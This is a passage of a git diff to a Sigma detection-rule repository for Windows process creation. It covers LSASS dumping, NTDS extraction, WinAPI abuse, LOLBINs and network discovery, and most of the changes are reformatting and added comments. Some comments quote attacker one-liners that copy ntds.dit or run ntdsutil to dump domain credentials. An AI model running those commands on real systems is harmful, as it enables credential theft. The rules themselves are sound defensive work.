attack.t1036.008 logsource: category: process_creation product: windows @@ -28,60 +23,59 @@ detection: EventID: 4688 Channel: Security selection_upper: - CommandLine|contains: - - "\u0410" - - "\u0412" - - "\u0415" - - "\u041A" - - "\u041C" - - "\u041D" - - "\u041E" - - "\u0420" - - "\u0421" - - "\u0422" - - "\u0425" - - "\u0405" - - "\u0406" - - "\u0408" - - "\u04AE" - - "\u04C0" - - "\u050C" - - "\u051A" - - "\u051C" - - "\u0391" - - "\u0392" - - "\u0395" - - "\u0396" - - "\u0397" - - "\u0399" - - "\u039A" - - "\u039C" - - "\u039D" - - "\u039F" - - "\u03A1" - - "\u03A4" - - "\u03A5" - - "\u03A7" + CommandLine|contains: + - А # А/A + - В # В/B + - Е # Е/E + - К # К/K + - М # М/M + - Н # Н/H + - О # О/O + - Р # Р/P + - С # С/C + - Т # Т/T + - Х # Х/X + - Ѕ # Ѕ/S + - І # І/I + - Ј # Ј/J + - Ү # Ү/Y + - Ӏ # Ӏ/I + - Ԍ # Ԍ/G + - Ԛ # Ԛ/Q + - Ԝ # Ԝ/W + - Α # Α/A + - Β # Β/B + - Ε # Ε/E + - Ζ # Ζ/Z + - Η # Η/H + - Ι # Ι/I + - Κ # Κ/K + - Μ # Μ/M + - Ν # Ν/N + - Ο # Ο/O + - Ρ # Ρ/P + - Τ # Τ/T + - Υ # Υ/Y + - Χ # Χ/X selection_lower: - CommandLine|contains: - - "\u0430" - - "\u0435" - - "\u043E" - - "\u0440" - - "\u0441" - - "\u0445" - - "\u0455" - - "\u0456" - - "\u04CF" - - "\u0458" - - "\u04BB" - - "\u0501" - - "\u051B" - - "\u051D" - - "\u03BF" + CommandLine|contains: + - а # а/a + - е # е/e + - о # о/o + - р # р/p + - с # с/c + - х # х/x + - ѕ # ѕ/s + - і # і/i + - ӏ # ӏ/l + - ј # ј/j + - һ # һ/h + - ԁ # ԁ/d + - ԛ # ԛ/q + - ԝ # ԝ/w + - ο # ο/o condition: process_creation and (1 of selection_*) falsepositives: - - Commandlines with legitimate Cyrillic text; will likely require tuning (or not - be usable) in countries where these alphabets are in use. + - Commandlines with legitimate Cyrillic text; will likely require tuning (or not be usable) in countries where these alphabets are in use. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_image_missing.yml b/sigma/builtin/process_creation/proc_creation_win_susp_image_missing.yml index ffa3bebb7..2394eb851 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_image_missing.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_image_missing.yml @@ -1,9 +1,7 @@ title: Execution Of Non-Existing File id: 71158e3f-df67-472b-930e-7d287acaa3e1 status: test -description: Checks whether the image specified in a process creation event is not - a full, absolute path (caused by process ghosting or other unorthodox methods - to start a process) +description: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process) references: - https://pentestlaboratories.com/2021/12/08/process-ghosting/ author: Max Altgelt (Nextron Systems) @@ -19,23 +17,23 @@ detection: EventID: 4688 Channel: Security image_absolute_path: - NewProcessName|contains: \ + NewProcessName|contains: \ filter_null: - NewProcessName: null + NewProcessName: filter_empty: - NewProcessName: + NewProcessName: - '-' - '' filter_4688: - - NewProcessName: - - System - - Registry - - MemCompression - - vmmem - - CommandLine: - - Registry - - MemCompression - - vmmem + - NewProcessName: + - System + - Registry + - MemCompression + - vmmem + - CommandLine: + - Registry + - MemCompression + - vmmem condition: process_creation and (not image_absolute_path and not 1 of filter*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml b/sigma/builtin/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml index c38eeb2f5..f8d5112d9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml @@ -16,8 +16,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: - - TVqQAAMAAAAEAAAA + CommandLine|contains: + - TVqQAAMAAAAEAAAA # MZ.......... - TVpQAAIAAAAEAA8A - TVqAAAEAAAAEABAA - TVoAAAAAAAAAAAAA diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_inline_win_api_access.yml b/sigma/builtin/process_creation/proc_creation_win_susp_inline_win_api_access.yml index ed9f08913..074463b70 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_inline_win_api_access.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_inline_win_api_access.yml @@ -1,11 +1,10 @@ title: Potential WinAPI Calls Via CommandLine id: ba3f5c1b-6272-4119-9dbd-0bc8d21c2702 related: - - id: 03d83090-8cba-44a0-b02f-0b756a050306 - type: derived + - id: 03d83090-8cba-44a0-b02f-0b756a050306 + type: derived status: test -description: Detects the use of WinAPI Functions via the commandline. As seen used - by threat actors via the tool winapiexec +description: Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec references: - https://twitter.com/m417z/status/1566674631788007425 author: Nasreddine Bencherchali (Nextron Systems) @@ -22,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - AddSecurityPackage - AdjustTokenPrivileges - Advapi32 @@ -48,6 +47,7 @@ detection: - LoadLibrary - memcpy - MiniDumpWriteDump + # - 'msvcrt' - ntdll - OpenDesktop - OpenProcess @@ -61,6 +61,7 @@ detection: - RtlCreateUserThread - secur32 - SetThreadToken + # - 'user32' - VirtualAlloc - VirtualFree - VirtualProtect @@ -69,8 +70,8 @@ detection: - WriteProcessMemory - ZeroFreeGlobalAllocUnicode filter_optional_mpcmdrun: - CommandLine|contains: GetLoadLibraryWAddress32 - NewProcessName|endswith: \MpCmdRun.exe + CommandLine|contains: GetLoadLibraryWAddress32 + NewProcessName|endswith: \MpCmdRun.exe condition: process_creation and (selection and not 1 of filter_optional_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml b/sigma/builtin/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml index c67871909..fe4cbaf1e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml @@ -19,44 +19,43 @@ detection: EventID: 4688 Channel: Security selection_other_img: - NewProcessName|endswith: + NewProcessName|endswith: - \whoami.exe - \quser.exe - \qwinsta.exe selection_other_wmi: - CommandLine|contains|all: + CommandLine|contains|all: - useraccount - get - NewProcessName|endswith: \wmic.exe + NewProcessName|endswith: \wmic.exe selection_other_cmdkey: - CommandLine|contains: ' /l' - NewProcessName|endswith: \cmdkey.exe + CommandLine|contains: ' /l' + NewProcessName|endswith: \cmdkey.exe selection_cmd: - CommandLine|contains|all: + CommandLine|contains|all: - ' /c' - 'dir ' - \Users\ - NewProcessName|endswith: \cmd.exe + NewProcessName|endswith: \cmd.exe filter_cmd: - CommandLine|contains: ' rmdir ' + CommandLine|contains: ' rmdir ' # don't match on 'dir' "C:\Windows\System32\cmd.exe" /q /c rmdir /s /q "C:\Users\XX\AppData\Local\Microsoft\OneDrive\19.232.1124.0005" selection_net: - CommandLine|contains: user - NewProcessName|endswith: + CommandLine|contains: user + NewProcessName|endswith: - \net.exe - \net1.exe filter_net: - CommandLine|contains: - - /domain - - /add - - /delete - - /active - - /expires - - /passwordreq - - /scriptpath - - /times - - /workstations - condition: process_creation and ((selection_cmd and not filter_cmd) or (selection_net - and not filter_net) or 1 of selection_other_*) + CommandLine|contains: + - /domain # local account discovery only + - /add # discovery only + - /delete # discovery only + - /active # discovery only + - /expires # discovery only + - /passwordreq # discovery only + - /scriptpath # discovery only + - /times # discovery only + - /workstations # discovery only + condition: process_creation and ((selection_cmd and not filter_cmd) or (selection_net and not filter_net) or 1 of selection_other_*) falsepositives: - Legitimate administrator or user enumerates local users for legitimate reason level: low diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml b/sigma/builtin/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml index a4639664a..9114f8e85 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml @@ -1,17 +1,15 @@ title: LOLBIN Execution From Abnormal Drive id: d4ca7c59-e9e4-42d8-bf57-91a776efcb87 related: - - id: 5b80cf53-3a46-4adc-960b-05ec19348d74 - type: similar + - id: 5b80cf53-3a46-4adc-960b-05ec19348d74 + type: similar status: test -description: Detects LOLBINs executing from an abnormal or uncommon drive such as - a mounted ISO. +description: Detects LOLBINs executing from an abnormal or uncommon drive such as a mounted ISO. references: - https://thedfirreport.com/2021/12/13/diavol-ransomware/ - https://www.scythe.io/library/threat-emulation-qakbot - https://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/ -author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Angelo Violetti - - SEC Consult '@angelo_violetti', Aaron Herman +author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Angelo Violetti - SEC Consult '@angelo_violetti', Aaron Herman date: 2022/01/25 modified: 2023/08/29 tags: @@ -24,32 +22,33 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: - - \calc.exe - - \certutil.exe - - \cmstp.exe - - \cscript.exe - - \installutil.exe - - \mshta.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - OriginalFileName: - - CALC.EXE - - CertUtil.exe - - CMSTP.EXE - - cscript.exe - - installutil.exe - - MSHTA.EXE - - REGSVR32.EXE - - RUNDLL32.EXE - - wscript.exe + # Note: add more lolbins for additional coverage + - NewProcessName|endswith: + - \calc.exe + - \certutil.exe + - \cmstp.exe + - \cscript.exe + - \installutil.exe + - \mshta.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - OriginalFileName: + - CALC.EXE + - CertUtil.exe + - CMSTP.EXE + - cscript.exe + - installutil.exe + - MSHTA.EXE + - REGSVR32.EXE + - RUNDLL32.EXE + - wscript.exe filter_main_currentdirectory: CurrentDirectory|contains: C:\ filter_main_empty: CurrentDirectory: '' filter_main_null: - CurrentDirectory: null + CurrentDirectory: condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Rare false positives could occur on servers with multiple drives. diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml b/sigma/builtin/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml index a0a8abb8a..92e8611bc 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml @@ -1,14 +1,11 @@ title: LSASS Dump Keyword In CommandLine id: ffa6861c-4461-4f59-8a41-578c39f3f23e related: - - id: a5a2d357-1ab8-4675-a967-ef9990a59391 - type: derived + - id: a5a2d357-1ab8-4675-a967-ef9990a59391 + type: derived status: test -description: 'Detects the presence of the keywords "lsass" and ".dmp" in the commandline, - which could indicate a potential attempt to dump or create a dump of the lsass - process. - - ' +description: | + Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process. references: - https://github.com/Hackndo/lsassy - https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf @@ -16,8 +13,7 @@ references: - https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/ - https://github.com/helpsystems/nanodump - https://github.com/CCob/MirrorDump -author: E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron - Systems) +author: E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2019/10/24 modified: 2023/08/29 tags: @@ -31,25 +27,25 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|contains: - - lsass.dmp - - lsass.zip - - lsass.rar - - Andrew.dmp - - Coredump.dmp - - NotLSASS.zip - - lsass_2 - - lsassdump - - lsassdmp - - CommandLine|contains|all: - - lsass - - .dmp - - CommandLine|contains|all: - - SQLDmpr - - .mdmp - - CommandLine|contains|all: - - nanodump - - .dmp + - CommandLine|contains: + - lsass.dmp + - lsass.zip + - lsass.rar + - Andrew.dmp + - Coredump.dmp + - NotLSASS.zip # https://github.com/CCob/MirrorDump + - lsass_2 # default format of procdump v9.0 is lsass_YYMMDD_HHmmss.dmp + - lsassdump + - lsassdmp + - CommandLine|contains|all: + - lsass + - .dmp + - CommandLine|contains|all: + - SQLDmpr + - .mdmp + - CommandLine|contains|all: + - nanodump + - .dmp condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml b/sigma/builtin/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml index ec151f422..310c65511 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml @@ -1,15 +1,12 @@ title: Potential File Download Via MS-AppInstaller Protocol Handler id: 180c7c5c-d64b-4a63-86e9-68910451bc8b related: - - id: 7cff77e1-9663-46a3-8260-17f2e1aa9d0a - type: derived + - id: 7cff77e1-9663-46a3-8260-17f2e1aa9d0a + type: derived status: experimental -description: 'Detects usage of the "ms-appinstaller" protocol handler via command - line to potentially download arbitrary files via AppInstaller.EXE - +description: | + Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\" - - ' references: - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/ author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel @@ -26,7 +23,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ms-appinstaller://?source= - http condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_network_command.yml b/sigma/builtin/process_creation/proc_creation_win_susp_network_command.yml index e127bfae4..c68f737b4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_network_command.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_network_command.yml @@ -1,8 +1,7 @@ title: Suspicious Network Command id: a29c1813-ab1f-4dde-b489-330b952e91ae status: test -description: Adversaries may look for details about the network configuration and - settings of systems they access or through information discovery of remote systems +description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-1---system-network-configuration-discovery-on-windows author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' @@ -19,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ipconfig /all - netsh interface show interface - arp -a diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_network_scan_loop.yml b/sigma/builtin/process_creation/proc_creation_win_susp_network_scan_loop.yml index beb0c354f..f4e33d594 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_network_scan_loop.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_network_scan_loop.yml @@ -1,9 +1,7 @@ title: Suspicious Scan Loop Network id: f8ad2e2c-40b6-4117-84d7-20b89896ab23 status: test -description: Adversaries may attempt to get a listing of other systems by IP address, - hostname, or other logical identifier on a network that may be used for Lateral - Movement from the current system +description: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md - https://ss64.com/nt/for.html @@ -23,11 +21,11 @@ detection: EventID: 4688 Channel: Security selection_loop: - CommandLine|contains: + CommandLine|contains: - 'for ' - 'foreach ' selection_tools: - CommandLine|contains: + CommandLine|contains: - nslookup - ping condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_network_sniffing.yml b/sigma/builtin/process_creation/proc_creation_win_susp_network_sniffing.yml index 92da5eb34..770626bd0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_network_sniffing.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_network_sniffing.yml @@ -1,17 +1,10 @@ title: Potential Network Sniffing Activity Using Network Tools id: ba1f7802-adc7-48b4-9ecb-81e227fddfd5 status: test -description: 'Detects potential network sniffing via use of network tools such as - "tshark", "windump". - - Network sniffing refers to using the network interface on a system to monitor - or capture information sent over a wired or wireless connection. - - An adversary may place a network interface into promiscuous mode to passively - access data in transit over the network, or use span ports to capture a larger - amount of data. - - ' +description: | + Detects potential network sniffing via use of network tools such as "tshark", "windump". + Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. + An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md author: Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems) @@ -29,10 +22,10 @@ detection: EventID: 4688 Channel: Security selection_tshark: - CommandLine|contains: -i - NewProcessName|endswith: \tshark.exe + CommandLine|contains: -i + NewProcessName|endswith: \tshark.exe selection_windump: - NewProcessName|endswith: \windump.exe + NewProcessName|endswith: \windump.exe condition: process_creation and (1 of selection_*) falsepositives: - Legitimate administration activity to troubleshoot network issues diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_non_exe_image.yml b/sigma/builtin/process_creation/proc_creation_win_susp_non_exe_image.yml index ed6d2a60a..793569b8a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_non_exe_image.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_non_exe_image.yml @@ -1,14 +1,9 @@ title: Execution of Suspicious File Type Extension id: c09dad97-1c78-4f71-b127-7edb2b8e491a status: experimental -description: 'Detects whether the image specified in a process creation event doesn''t - refer to an ".exe" (or other known executable extension) file. This can be caused - by process ghosting or other unorthodox methods to start a process. - - This rule might require some initial baselining to align with some third party - tooling in the user environment. - - ' +description: | + Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process. + This rule might require some initial baselining to align with some third party tooling in the user environment. references: - https://pentestlaboratories.com/2021/12/08/process-ghosting/ author: Max Altgelt (Nextron Systems) @@ -24,66 +19,65 @@ detection: EventID: 4688 Channel: Security known_image_extension: - NewProcessName|endswith: + NewProcessName|endswith: - .bin - .cgi - .com - .exe - .scr - - .tmp - filter_main_image: - NewProcessName: + - .tmp # sadly many installers use this extension + filter_main_image: # Windows utilities without extension + NewProcessName: - System - Registry - MemCompression - vmmem filter_main_msi_installers: - NewProcessName|contains: :\Windows\Installer\MSI + NewProcessName|contains: :\Windows\Installer\MSI filter_main_driver_store: - NewProcessName|contains: :\Windows\System32\DriverStore\FileRepository\ + NewProcessName|contains: :\Windows\System32\DriverStore\FileRepository\ filter_main_msi_rollbackfiles: - NewProcessName|contains: :\Config.Msi\ - NewProcessName|endswith: + NewProcessName|contains: :\Config.Msi\ + NewProcessName|endswith: - .rbf - .rbs filter_main_windows_temp: - - ParentProcessName|contains: :\Windows\Temp\ - - NewProcessName|contains: :\Windows\Temp\ + - ParentProcessName|contains: :\Windows\Temp\ + - NewProcessName|contains: :\Windows\Temp\ filter_main_deleted: - NewProcessName|contains: :\$Extend\$Deleted\ + NewProcessName|contains: :\$Extend\$Deleted\ filter_main_empty: - NewProcessName: + NewProcessName: - '-' - '' filter_main_null: - NewProcessName: null + NewProcessName: filter_optional_avira: ParentProcessName|contains: :\ProgramData\Avira\ filter_optional_nvidia: - NewProcessName|contains: NVIDIA\NvBackend\ - NewProcessName|endswith: .dat + NewProcessName|contains: NVIDIA\NvBackend\ + NewProcessName|endswith: .dat filter_optional_winpakpro: - NewProcessName|contains: + NewProcessName|contains: - :\Program Files (x86)\WINPAKPRO\ - :\Program Files\WINPAKPRO\ - NewProcessName|endswith: .ngn + NewProcessName|endswith: .ngn filter_optional_myq_server: - NewProcessName|endswith: + NewProcessName|endswith: - :\Program Files (x86)\MyQ\Server\pcltool.dll - :\Program Files\MyQ\Server\pcltool.dll filter_optional_wsl: - NewProcessName|contains|all: + NewProcessName|contains|all: - \AppData\Local\Packages\ - \LocalState\rootfs\ filter_optional_lzma_exe: - NewProcessName|endswith: \LZMA_EXE + NewProcessName|endswith: \LZMA_EXE filter_optional_firefox: - NewProcessName|contains: :\Program Files\Mozilla Firefox\ + NewProcessName|contains: :\Program Files\Mozilla Firefox\ filter_optional_docker: ParentProcessName: C:\Windows\System32\services.exe - NewProcessName|endswith: com.docker.service - condition: process_creation and (not known_image_extension and not 1 of filter_main_* - and not 1 of filter_optional_*) + NewProcessName|endswith: com.docker.service + condition: process_creation and (not known_image_extension and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml b/sigma/builtin/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml index aad0e1e3f..bc01117d6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml @@ -1,8 +1,7 @@ title: Non-privileged Usage of Reg or Powershell id: 8f02c935-effe-45b3-8fc9-ef8696a9e41d status: test -description: Search for usage of reg or Powershell by non-privileged users to modify - service configuration in registry +description: Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry references: - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-20-638.jpg author: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community @@ -19,20 +18,20 @@ detection: EventID: 4688 Channel: Security reg: - CommandLine|contains|all: + CommandLine|contains|all: - 'reg ' - add powershell: - CommandLine|contains: + CommandLine|contains: - powershell - set-itemproperty - ' sp ' - new-itemproperty select_data: - CommandLine|contains|all: + CommandLine|contains|all: - ControlSet - Services - CommandLine|contains: + CommandLine|contains: - ImagePath - FailureCommand - ServiceDLL diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_ntds.yml b/sigma/builtin/process_creation/proc_creation_win_susp_ntds.yml index 4a8fc943c..7a1fa3f2b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_ntds.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_ntds.yml @@ -24,46 +24,51 @@ detection: EventID: 4688 Channel: Security selection_tool: - - NewProcessName|endswith: - - \NTDSDump.exe - - \NTDSDumpEx.exe - - CommandLine|contains|all: - - ntds.dit - - system.hiv - - CommandLine|contains: NTDSgrab.ps1 + # https://github.com/zcgonvh/NTDSDumpEx + - NewProcessName|endswith: + - \NTDSDump.exe + - \NTDSDumpEx.exe + - CommandLine|contains|all: + # ntdsdumpex.exe -d ntds.dit -o hash.txt -s system.hiv + - ntds.dit + - system.hiv + - CommandLine|contains: NTDSgrab.ps1 selection_oneliner_1: - CommandLine|contains|all: + # powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q" + CommandLine|contains|all: - ac i ntds - create full selection_onliner_2: - CommandLine|contains|all: + # cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit + CommandLine|contains|all: - '/c copy ' - \windows\ntds\ntds.dit selection_onliner_3: - CommandLine|contains|all: + # ntdsutil "activate instance ntds" "ifm" "create full c:\windows\temp\data\" "quit" "quit" + CommandLine|contains|all: - activate instance ntds - create full selection_powershell: - CommandLine|contains|all: + CommandLine|contains|all: - powershell - ntds.dit set1_selection_ntds_dit: - CommandLine|contains: ntds.dit + CommandLine|contains: ntds.dit set1_selection_image_folder: - - ParentProcessName|contains: - - \apache - - \tomcat - - \AppData\ - - \Temp\ - - \Public\ - - \PerfLogs\ - - NewProcessName|contains: - - \apache - - \tomcat - - \AppData\ - - \Temp\ - - \Public\ - - \PerfLogs\ + - ParentProcessName|contains: + - \apache + - \tomcat + - \AppData\ + - \Temp\ + - \Public\ + - \PerfLogs\ + - NewProcessName|contains: + - \apache + - \tomcat + - \AppData\ + - \Temp\ + - \Public\ + - \PerfLogs\ condition: process_creation and (1 of selection* or all of set1*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml b/sigma/builtin/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml index 491d57d9c..4b71eca72 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml @@ -1,11 +1,10 @@ title: Potentially Suspicious Call To Win32_NTEventlogFile Class id: caf201a9-c2ce-4a26-9c3a-2b9525413711 related: - - id: e2812b49-bae0-4b21-b366-7c142eafcde2 - type: similar + - id: e2812b49-bae0-4b21-b366-7c142eafcde2 + type: similar status: experimental -description: Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially - suspicious way (delete, backup, change permissions, etc.) from a PowerShell script +description: Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script references: - https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85) author: Nasreddine Bencherchali (Nextron Systems) @@ -20,9 +19,9 @@ detection: EventID: 4688 Channel: Security selection_class: - CommandLine|contains: Win32_NTEventlogFile + CommandLine|contains: Win32_NTEventlogFile selection_function: - CommandLine|contains: + CommandLine|contains: - .BackupEventlog( - .ChangeSecurityPermissions( - .ChangeSecurityPermissionsEx( diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml b/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml index fc5e77648..f2b2d29cb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml @@ -1,11 +1,10 @@ title: Use Short Name Path in Command Line id: 349d891d-fef0-4fe4-bc53-eee623a15969 related: - - id: a96970af-f126-420d-90e1-d37bf25e50e1 - type: similar + - id: a96970af-f126-420d-90e1-d37bf25e50e1 + type: similar status: test -description: Detect use of the Windows 8.3 short name. Which could be used as a method - to avoid command-line detection +description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection references: - https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN @@ -24,28 +23,27 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ~1\ - ~2\ filter: - - ParentProcessName: - - C:\Windows\System32\Dism.exe - - C:\Windows\System32\cleanmgr.exe - - C:\Program Files\GPSoftware\Directory Opus\dopus.exe - - ParentProcessName|endswith: - - \WebEx\WebexHost.exe - - \thor\thor64.exe - - \veam.backup.shell.exe - - \winget.exe - - \Everything\Everything.exe - - ParentProcessName|contains: \AppData\Local\Temp\WinGet\ - - CommandLine|contains: - - \appdata\local\webex\webex64\meetings\wbxreport.exe - - C:\Program Files\Git\post-install.bat - - C:\Program Files\Git\cmd\scalar.exe + - ParentProcessName: + - C:\Windows\System32\Dism.exe + - C:\Windows\System32\cleanmgr.exe + - C:\Program Files\GPSoftware\Directory Opus\dopus.exe + - ParentProcessName|endswith: + - \WebEx\WebexHost.exe + - \thor\thor64.exe + - \veam.backup.shell.exe + - \winget.exe + - \Everything\Everything.exe + - ParentProcessName|contains: \AppData\Local\Temp\WinGet\ + - CommandLine|contains: + - \appdata\local\webex\webex64\meetings\wbxreport.exe + - C:\Program Files\Git\post-install.bat + - C:\Program Files\Git\cmd\scalar.exe condition: process_creation and (selection and not filter) falsepositives: - - Applications could use this notation occasionally which might generate some - false positives. In that case investigate the parent and child process. + - Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml b/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml index 8bb36804d..0cdabc78e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml @@ -1,11 +1,10 @@ title: Use Short Name Path in Image id: a96970af-f126-420d-90e1-d37bf25e50e1 related: - - id: 349d891d-fef0-4fe4-bc53-eee623a15969 - type: similar + - id: 349d891d-fef0-4fe4-bc53-eee623a15969 + type: similar status: experimental -description: Detect use of the Windows 8.3 short name. Which could be used as a method - to avoid Image detection +description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection references: - https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN @@ -24,29 +23,28 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|contains: + NewProcessName|contains: - ~1\ - ~2\ filter1: - - ParentProcessName: - - C:\Windows\System32\Dism.exe - - C:\Windows\System32\cleanmgr.exe - - ParentProcessName|endswith: - - \WebEx\WebexHost.exe - - 